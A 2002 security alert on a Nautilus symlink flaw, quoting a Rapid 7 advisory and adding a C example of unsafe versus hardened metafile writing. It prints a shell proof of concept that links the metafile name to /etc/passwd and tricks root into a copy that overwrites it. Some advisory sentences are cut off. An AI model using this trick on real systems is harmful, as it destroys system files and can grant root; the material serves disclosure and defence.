Nautilus GNOME Shell and File Manager Symlink Hole May Let Local Users Cause Other Users to Overwrite Files on the System
SecurityTracker Alert ID: 1004212
SecurityTracker URL: http://securitytracker.com/id/1004212
Date: May 2 2002
Modification of system information, Modification of user information, Root access via local system, User access via local system
Fix Available: Yes. Vendor Confirmed: Yes.
A temporary file symbolic link (symlink) vulnerability was reported in Nautilus, the GNOME shell and file manager. A local user could cause another user to overwrite files on the system. In some cases, this could allow a local user to obtain root privileges on the system.
Rapid 7 reports that when a local user copies files from one directory to another directory, Nautilus will create a small (88+ bytes) XML file named '.nautilus-metafile.xml' in the target directory. The software apparently does not check to see if a symlink with the same name already exists before writing to it.
A local user could create, in a directory of their choosing, a symlink named after the Nautilus XML file that points at a critical file. The local user could then persuade another user on the system to copy a file into that directory. When the other user performs the copy with Nautilus, Nautilus writes to the XML file name, the write follows the symlink, and the linked file is overwritten with the privileges of the other user.
A local user can therefore cause files to be overwritten by other users whenever those users invoke Nautilus to perform certain copy operations. If the "other user" is a root-level user, the local user could obtain root-level access on the system.
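The write pattern behind this report, and the one that closes it, as an added C example that is not Nautilus's code (the metafile name is the one the advisory gives; the sample XML record, the demo directory and the helper names are assumptions): the unsafe writer opens the fixed file name and so follows any symlink planted there, while the hardened writer fills a fresh mkstemp() file and renames it into place, which replaces the planted link instead of writing through it.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define METAFILE ".nautilus-metafile.xml"
static const char XML[] = "<file name=\"example.doc\" icon_position=\"55,105\"/>\n"; /* constructed sample */
/* Unsafe pattern (assumed shape, not Nautilus's source): open() follows any
 * symlink planted at the fixed name, so the XML lands on the link target. */
int write_metafile_unsafe(const char *dir) {
    char path[4096];
    snprintf(path, sizeof path, "%s/" METAFILE, dir);
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    ssize_t n = write(fd, XML, strlen(XML)); close(fd);
    return n == (ssize_t)strlen(XML) ? 0 : -1;
}
/* Hardened pattern: write into a fresh mkstemp() file (created O_EXCL, so a
 * planted entry is never reused), then rename() it over the metafile name;
 * rename() swaps the directory entry without following a symlink there. */
int write_metafile_safe(const char *dir) {
    char path[4096], tmp[4096];
    snprintf(path, sizeof path, "%s/" METAFILE, dir);
    snprintf(tmp, sizeof tmp, "%s/" METAFILE ".XXXXXX", dir);
    int fd = mkstemp(tmp);
    if (fd < 0) return -1;
    ssize_t n = write(fd, XML, strlen(XML)); close(fd);
    if (n != (ssize_t)strlen(XML) || rename(tmp, path) != 0) { unlink(tmp); return -1; }
    return 0;
}
/* Demo scaffold: a constructed "sensitive" file plus a symlink to it at the
 * metafile name, mirroring the ln -s step in the advisory. */
int plant_symlink(const char *dir, const char *target) {
    char link[4096];
    mkdir(dir, 0700);
    FILE *f = fopen(target, "w");
    if (!f || fputs("original\n", f) == EOF || fclose(f) != 0) return -1;
    snprintf(link, sizeof link, "%s/" METAFILE, dir);
    unlink(link);
    return symlink(target, link);
}
/* 1 if target still holds its original content, 0 if it was clobbered. */
int target_intact(const char *target) {
    char buf[64] = {0};
    FILE *f = fopen(target, "r");
    if (f) { fread(buf, 1, sizeof buf - 1, f); fclose(f); }
    return strcmp(buf, "original\n") == 0;
}
```

The rename-based form also covers a planted hard link, which O_NOFOLLOW alone would not, because the directory entry is replaced rather than opened.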
The vendor has reportedly released a fix in CVS. Download a more recent version from:
Vendor URL: nautilus.eazel.com/
Access control error, State error
Underlying OS: Linux (Any), UNIX (Any)
Source Message Contents
Subject: Nautilus Symlink Vulnerability
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
Rapid 7 Advisory R7-000x: Nautilus Symlink Vulnerability
Published: Not yet published.
CVE ID: CAN-2002-0157
Bugtraq ID: Not yet assigned.
1. Affected system(s):
o Nautilus 1.0.4
Apparently NOT VULNERABLE:
Nautilus is a graphical shell for GNOME. It contains a
which would allow a malicious user to mount a symlink attack to
another user's files.
The Common Vulnerabilities and Exposures (CVE) project has assigned
the identifier CAN-2002-0157 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org/), which
names for security problems.
BUGTRAQ has assigned the identifier xxx to this vulnerability.
More information on BUGTRAQ can be found at
3. Vendor status and information
Vendor notified 03/26/2002.
5. Detailed analysis
When copying files from one directory to another, Nautilus creates a
(88+ bytes) XML file called '.nautilus-metafile.xml' in the target
directory. It does not check if a symlink with the same name
exists there, and blindly writes XML data to it. The following
shows how to cause a system-wide denial of service attack with this
[jdog@imisshogs jdog]$ pwd
[jdog@imisshogs jdog]$ cat /etc/passwd
[jdog@imisshogs jdog]$ ln -s /etc/passwd .nautilus-metafile.xml
[jdog@imisshogs jdog]$ mail root
Could you please copy "lonely-in-new-york.doc" to my home
[jdog@imisshogs jdog]$ sleep 86400
[jdog@imisshogs jdog]$ ls -l *.doc
-rw-r--r-- 1 root root 13 Mar 24 18:09
[jdog@imisshogs jdog]$ cat /etc/passwd
<file name="lonely-in-new-york.doc" icon_position="55,105"/>
6. Contact Information
Rapid 7 Security Advisories
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory in electronic media
only, providing that no changes are made and that the copyright
notices and disclaimers remain intact. This advisory may not be
printed or distributed in non-electronic media without the
express written permission of Rapid 7, Inc.